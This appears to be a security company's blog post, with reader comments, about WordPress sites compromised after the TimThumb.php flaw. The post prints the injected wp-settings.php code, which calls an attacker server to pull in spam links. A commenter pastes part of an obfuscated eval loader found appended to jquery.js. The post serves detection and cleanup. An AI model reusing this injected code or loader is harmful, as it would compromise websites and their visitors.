We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.
What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:
function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("http://91.196.216.30/bot.php?ip=’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
‘&ua=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]).’&ref=’.$_SERVER
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");
What this code does is very simple. It connects to http://91.196.216.30/bot.php to get a few links to be added to the bottom of your site. Links like:
<a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights.html" alt="Sweater
Tights" title="Sweater Tights">Sweater Tights</a>
dilbert sweater vest comic
<br>knitting softwares
the knitting room fond du lac
<a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions.html" alt="Knitting
Instructions" title="Knitting Instructions">Knitting Instructions</a>
knitting little luxuries louisa harding
It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.
What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:
Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890
So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.
You can check your site here to see if it has this issue: Sucuri SiteCheck
If you need help cleaning up up, sign up here: http://sucuri.net/signup
John Castro
Luke Leal
Krasimir Konov
Denis Sinegubko
Samuel Odendaal
Daniel Cid
13 comments
The question now is to find how they did this after all the TimThumb related stuff were removed.
Probably a backdoor that wasn’t removed?
Yes, in fact that is was makes more sense, but they must be hidding it really well. Were you able to detect any other backdoors besides the one described earlier?
Just noticed all my WP installation were hit with this same malware. I thought I had everything fixed and updated. Anyone have an idea where the backdoor may be?
Will the Sucuri scanner pick this up and email users registered to your service?
I found that in one of my sites that had come through your scanner as clean. Just a few minutes ago. Thanks for keeping up the great information on this.
Not sure if this came in through Timthumb. I updated the script on my wp site and chmoded it to 644 already several days ago. Then my a/v set off an alarm today when I surfed to my site.
Your site scanner didn’t detect it (yet) but I decided to check all the files on my site anyway.
Found this at the end of jquery.js and all the jquery.minXXX.js files. Plus, all the files and folders on my site had been chmodded to 777!
var lK0LEmv=3243408; var ofa5OVnde=9709687; var xDlN28CbW=42025; var sIAF695=371784; var vww = new Array(13282956, 13282971, 13282964, 13282953, 13282970, 13282959, 13282965, 13282964, 13282886, 13282931, 13282951, 13282961, 13282955, 13282924, 13282968, 13282951, 13282963, 13282955, …
13282913, 13282979);GPifTs = “”;for (xIZFe = 0; xIZFe < vww.length; xIZFe ++) { GPifTs = GPifTs + String.fromCharCode(vww[xIZFe]-sIAF695+xDlN28CbW-ofa5OVnde-lK0LEmv); }; eval(GPifTs);
The scanner should have detected this one… Can you send us the full content of the file?
is http://sitecheck.sucuri.net/ down?
I have a site with custom posts where half of them seemed to vanish, and the only possible culprit we have been able to come up with is this TimThumb hack.
Has anyone seen this TimThumb issue cause posts to disappear?
YOUR SCAN DOESN´T WORK.. It shows my site OK but it has the Warning Link at my botton! please help with data, What can I do from my CPanel? …. suggestions’ Tks !!
http://www.seresponsable.com/
Comments are closed.